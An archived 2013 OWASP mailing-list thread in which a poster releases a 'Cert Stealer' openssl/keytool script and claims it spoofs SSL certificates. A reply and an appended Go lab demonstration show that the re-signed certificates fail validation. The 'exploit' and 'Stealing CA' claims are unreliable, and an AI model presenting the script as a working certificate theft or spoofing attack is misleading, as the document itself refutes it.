[Owasp-leaders] Cert Stealer Released

Gregory Disney gregory.disney at owasp.org
Thu Dec 26 19:38:23 UTC 2013


openssl s_client -showcerts -connect $host:$port </dev/null > $keyring.pem
openssl x509 -in $keyring.pem -pubkey > $keyring.cer
keytool -keystore $ks -importcert -alias $keyring.pem -file $keyring.pem \
    -storepass $passwd -noprompt
keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks \
    -storepass $passwd -noprompt
keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key \
    -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 \
    -storepass $passwd -noprompt
openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
echo "Stealing CA"
cat $keyring.key >> $keyring.pem
openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt \
    -signkey $keyring.key -CA $keyring.key -CAcreateserial

This is exactly how I do it: they are checking for the public key and 
private key. I'm not sure why openssl lets you resign as a key. But 
here is the source for the exploit.

On 12/26/13, 11:35 AM, Abbas Naderi wrote:
> I didn’t quite understand. What does the encoding vulnerability 
> expose? SSL certs are public-keys plus a bunch of other data. There is 
> no private key inside to extract and resign another certificate with.
> -A
> On Dec 26, 2013, at 2:32 PM, Gregory Disney <gregory.disney at owasp.org 
> <mailto:gregory.disney at owasp.org>> wrote:
>
>> I think a fair description would be it simplifies spoofing certs. 
>> This started out as a proof of concept a year ago when I realized 
>> there was a vulnerability in PEM encoding of SSL certs, so I 
>> chain-loaded a Java key store which was converted to a key, then 
>> resigned the cert with the chain-loaded key, thus keeping the context 
>> of the original certificate with a hijacked authority.
>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
>>> Well a description of what this does would be a good idea to start 
>>> with…
>>> -A
>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney 
>>> <gregory.disney at owasp.org <mailto:gregory.disney at owasp.org>> wrote:
>>>
>>>> I'm working on the documentation. It works by turning a keytool 
>>>> pk12 into an openssl key, then embedding the key on the root CA and 
>>>> resigning with the embedded key.
>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
>>>>>
>>>>> Hi Gregory, where can I find the details of how this works?
>>>>>
>>>>> Thx
>>>>>
>>>>> Dinis
>>>>>
>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org 
>>>>> <mailto:gregory.disney at owasp.org>> wrote:
>>>>>
>>>>>     Screen shot of successfully spoofed certs:
>>>>>     http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
>>>>>     Each of these certs has been tested and is capable of creating
>>>>>     SSL sessions.
>>>>>     Cert Stealer:
>>>>>     https://gist.github.com/gdisneyleugers/8129304
>>>>>     -Greg
>>>>>     _______________________________________________
>>>>>     OWASP-Leaders mailing list
>>>>>     OWASP-Leaders at lists.owasp.org
>>>>>     <mailto:OWASP-Leaders at lists.owasp.org>
>>>>>     https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>>>
>>>>
>>>
>>
>
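As an added, stand-alone illustration of the thread above (not code from the Cert Stealer gist or from any of the posters): a Go program, standard library only, that builds a throw-away lab CA and a server certificate issued by it, then does to that certificate what the script's final openssl x509 -signkey step does, namely re-signs it with a freshly generated key, and finally runs the two checks a relying party actually makes: chain validation against the trusted root, and a comparison of the SPKI pin. It also scans the certificate's PEM for a private-key block. The names "Lab Root CA" and example.test, and the 24-hour validity, are constructed for the demo.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/base64"
	"encoding/pem"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// Lab is a constructed PKI (nobody's real certificates): a root CA, the server
// certificate it issued, and the copy made by re-signing that certificate with
// a freshly generated key, which is what the script's last openssl step does.
type Lab struct{ Root, Server, Resigned *x509.Certificate }

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// issue signs tmpl (carrying pub) under parent with signer and parses the result.
func issue(tmpl, parent *x509.Certificate, pub *rsa.PublicKey, signer *rsa.PrivateKey) *x509.Certificate {
	der := must(x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer))
	return must(x509.ParseCertificate(der))
}

// BuildLab generates the lab PKI; "Lab Root CA" and example.test are made up.
func BuildLab() *Lab {
	now := time.Now()
	caKey := must(rsa.GenerateKey(rand.Reader, 2048))
	caTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "Lab Root CA"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		IsCA: true, BasicConstraintsValid: true, KeyUsage: x509.KeyUsageCertSign,
	}
	root := issue(caTmpl, caTmpl, &caKey.PublicKey, caKey)
	srvKey := must(rsa.GenerateKey(rand.Reader, 2048))
	srvTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2), Subject: pkix.Name{CommonName: "example.test"},
		DNSNames:  []string{"example.test"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		KeyUsage:    x509.KeyUsageDigitalSignature | x509.KeyUsageKeyEncipherment,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	server := issue(srvTmpl, root, &srvKey.PublicKey, caKey)
	// Equivalent of "openssl x509 -in cert.pem -signkey new.key": keep subject,
	// names and validity, swap in the new public key, sign with the new key
	// (so issuer == subject). The original private key plays no part.
	newKey := must(rsa.GenerateKey(rand.Reader, 2048))
	tmpl := *server                    // shallow copy of the parsed cert as the template
	tmpl.PublicKey = &newKey.PublicKey // parent must carry the signing key's public half
	resigned := issue(&tmpl, &tmpl, &newKey.PublicKey, newKey)
	return &Lab{Root: root, Server: server, Resigned: resigned}
}

// ChainsToRoot is the check every TLS client makes: does cert validate for host
// against the trusted root?
func ChainsToRoot(root, cert *x509.Certificate, host string) bool {
	pool := x509.NewCertPool()
	pool.AddCert(root)
	_, err := cert.Verify(x509.VerifyOptions{Roots: pool, DNSName: host})
	return err == nil
}

// SPKIPin is the base64 SHA-256 of the SubjectPublicKeyInfo, the value that
// public-key pinning compares; any change of key changes it.
func SPKIPin(c *x509.Certificate) string {
	sum := sha256.Sum256(c.RawSubjectPublicKeyInfo)
	return base64.StdEncoding.EncodeToString(sum[:])
}

// ToPEM encodes a certificate the way s_client -showcerts prints it.
func ToPEM(c *x509.Certificate) []byte {
	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: c.Raw})
}

// HasPrivateKey reports whether a PEM bundle contains any private-key block.
func HasPrivateKey(bundle []byte) bool {
	for b, rest := pem.Decode(bundle); b != nil; b, rest = pem.Decode(rest) {
		if strings.Contains(b.Type, "PRIVATE KEY") {
			return true
		}
	}
	return false
}

func main() {
	lab := BuildLab()
	fmt.Println("private key inside the issued cert's PEM:", HasPrivateKey(ToPEM(lab.Server)))
	for _, c := range []*x509.Certificate{lab.Server, lab.Resigned} {
		fmt.Printf("subject=%s issuer=%s chains_to_root=%v spki_pin=%s\n", c.Subject.CommonName,
			c.Issuer.CommonName, ChainsToRoot(lab.Root, c, "example.test"), SPKIPin(c))
	}
}
```

Run it with go run: the issued certificate validates, the re-signed one does not (it is now self-signed under its own subject with a key the CA never certified), the SPKI pin changes, and the certificate's PEM contains no private-key block. For a defender the useful takeaways are the two controls exercised here: a client rejects such a certificate unless its trust store has been altered, so trust-store changes are what to monitor, and pinning on the SPKI hash catches the key swap even if a rogue trust anchor were present.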
